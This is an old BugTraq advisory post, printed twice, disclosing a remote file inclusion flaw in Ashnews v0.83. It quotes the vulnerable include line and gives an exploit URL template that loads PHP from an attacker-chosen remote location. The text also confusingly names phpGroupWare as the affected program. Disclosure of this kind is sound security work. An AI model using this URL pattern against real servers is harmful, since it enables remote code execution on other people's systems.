BugTraq
Back to list
|
Post reply
sorry, wrong file
Jul 22 2003 03:05PM
phil dunn (z3hp yahoo com)
######################################################
## Name: Phil Dunn ##
## Email: z3hp (at) yahoo (dot) com [email concealed] ##
## Date: July - 20 - 2003 ##
## Program: Ashnews v0.83 ##
## Version: v0.83 ##
##Vendor Name: AshWebStudio ##
## Vendor URL: http://projects.ashwebstudio.com/ ##
######################################################
An include file vulnerability was found in phpGroupWare. This exploit
works for all Branches. A remote
user can create arbitrary PHP code and locate it on a remote server. Then,
the remote user can issue a
specially crafted URL to the target server that specifies the remote PHP
code for inclusion.
ashnews.php & ashheadlines.php @ line 14
-----------------------------------------------
include($pathtoashnews."ashprojects/newsconfig.php");
-----------------------------------------------
Exploit:
http://[server]/[ashweb dir]/ashnews.php?pathtoashnews=[remote location]
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
######################################################
## Name: Phil Dunn ##
## Email: z3hp (at) yahoo (dot) com [email concealed] ##
## Date: July - 20 - 2003 ##
## Program: Ashnews v0.83 ##
## Version: v0.83 ##
##Vendor Name: AshWebStudio ##
## Vendor URL: http://projects.ashwebstudio.com/ ##
######################################################
An include file vulnerability was found in phpGroupWare. This exploit
works for all Branches. A remote
user can create arbitrary PHP code and locate it on a remote server. Then,
the remote user can issue a
specially crafted URL to the target server that specifies the remote PHP
code for inclusion.
ashnews.php & ashheadlines.php @ line 14
-----------------------------------------------
include($pathtoashnews."ashprojects/newsconfig.php");
-----------------------------------------------
Exploit:
http://[server]/[ashweb dir]/ashnews.php?pathtoashnews=[remote location]
[ reply ]